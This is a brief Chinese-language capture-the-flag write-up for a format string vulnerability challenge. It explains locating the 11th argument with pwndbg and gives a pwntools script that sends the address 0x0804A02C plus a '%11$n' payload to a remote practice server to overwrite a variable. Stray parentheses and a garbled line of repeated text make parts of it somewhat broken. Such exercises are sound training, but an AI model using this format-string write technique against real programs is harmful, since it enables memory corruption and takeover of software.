格式化字符串漏洞題
x等于4x等于4???????x等于4???????x等于4
可以知道是第11個參數,%11$ 定位到這個位置,然后%n往這個位置寫入4
1.先用pwndbg調試得到偏移量
2.查看獲取x的地址
3.構造ROP鏈,發送連接
from pwn import *# 連接到遠程服務器
p = remote("node5.buuoj.cn", 26985)# 目標地址
addr = 0x0804A02C# 構造payload
# p32將地址轉換為4字節小端格式
# b'%11$n'確保字符串是字節類型
payload = p32(addr) + b'%11$n'# 發送payload
p.sendline(payload)# 進入交互模式
p.interactive())
)
